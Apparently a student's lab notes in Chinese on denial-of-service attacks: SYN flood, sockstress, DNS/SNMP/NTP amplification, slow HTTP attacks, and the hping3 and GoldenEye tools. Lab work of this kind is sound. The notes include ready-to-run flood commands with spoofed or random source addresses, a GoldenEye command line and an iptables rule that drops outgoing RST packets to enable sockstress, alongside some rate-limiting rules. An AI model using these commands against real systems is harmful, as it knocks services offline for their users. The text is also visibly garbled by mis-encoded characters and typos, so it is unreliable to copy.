一、YAN攻擊:
不停的發(fā)送SYN請求連接,服務(wù)器響應(yīng)SYN-ACK的確認(rèn)包,攻擊者沒有返回確認(rèn)包,而是繼續(xù)發(fā)送請求。(只有2次握手)
二、sockstress攻擊實試并寫出攻擊原理
原理:
針對TCP服務(wù)的拒絕服務(wù)攻擊,消耗被攻擊目標(biāo)系統(tǒng)資源 -與攻擊目標(biāo)建立大量socket鏈接,完成三次握手,最后的ACK包window大小為0 (客戶端不接收數(shù)據(jù)) -攻擊者資源消耗?。–PU、內(nèi)存、帶寬)
-異步攻擊,單機(jī)可拒絕服務(wù)高配資源服務(wù)器
-Window窗-實現(xiàn)的TCP流控
sockstress攻擊后
注意,要關(guān)閉RST,防火墻規(guī)則? ? iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.2.107 -j DROP

mkdir sockstress 新建文件夾
iptables -L?查看綁 RST
防范措施:
限制單位時間內(nèi)每IP建的TCP連接數(shù)
■封殺每30秒與80端口建立連接超過10個的IP地址
■iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
■ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10
-j DROP
■以上規(guī)則對DDoS攻擊無效
三、dns、snmp、ntp?放大攻擊原理
1、DNS放大攻擊原理:
-偽造源地址為被攻擊目標(biāo)地址,向遞歸域名查詢服務(wù)器發(fā)起查詢
-DNS服務(wù)器成為流量放大和實施攻擊者,大量DNS服務(wù)器實現(xiàn)DDoS
2、SNMP放大攻擊原理:
-請求流量小,查詢結(jié)果返回流量大 -結(jié)合偽造源地址實現(xiàn)攻擊
3、NTP放大攻擊原理:
-NTP服務(wù)提monlist (MON_GETLIST)查詢功能
????監(jiān)控NTP服務(wù)器的狀況
-客戶端查詢時,NTP服務(wù)器返回最后同步時間的600個客戶端IP
???每6個IP—個數(shù)據(jù)包,最多100個數(shù)據(jù)包(放大約100倍)
四、應(yīng)用層快速與慢速攻擊測試實驗
慢速攻擊實驗
CC攻擊原理:其實就是刷數(shù)據(jù)庫,數(shù)據(jù)庫在幾秒中之內(nèi)無法處理大量的動態(tài)連接,一旦處理不及時就會導(dǎo)致服務(wù)器崩潰

快速攻擊

五、hping3綜合攻擊ip偽造ip實驗
Hping3
-幾乎可以定制發(fā)送任何TCP/IP數(shù)據(jù)包,用于測試FW、端口掃描、性能測試
Syn Flood 攻擊
-hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source? 1.1.1.1
-hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
-hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP Flood)
ICMP Flood 攻擊
-hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
UDP Flood 攻擊
-hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
--rand-source 用公網(wǎng)隨機(jī)地址進(jìn)行攻擊
-a 1.1.1.1 偽造成1.1.1.1進(jìn)行攻擊
hping3 -n -S -d 100 -p 8080 --flood 192.168.2.107 -a 1.1.1.1

hping3 -c 1000 -d 120 -S -w 64 -p 8080 --flood --rand-source 192.168.2.107

六、GoldenEye?7層web測試驗驗
GoldenEye
-http/https拒絕服務(wù)攻擊工具
-安全研究為目的Python腳本
-隨機(jī)攻擊向量,keep-alive,避免緩存命中
goldeneye.py http://1.1.1.1 -w 50 –mrandom??? //-w 50代表50個人 ,-s 500代表每個人500個,50*500打25000個鏈接。

七、ddos防火墻安裝配置并實現(xiàn)防預(yù)
攻擊后被防御
注意:如果沒有防御,檢查一下端口號,再防火墻里添加
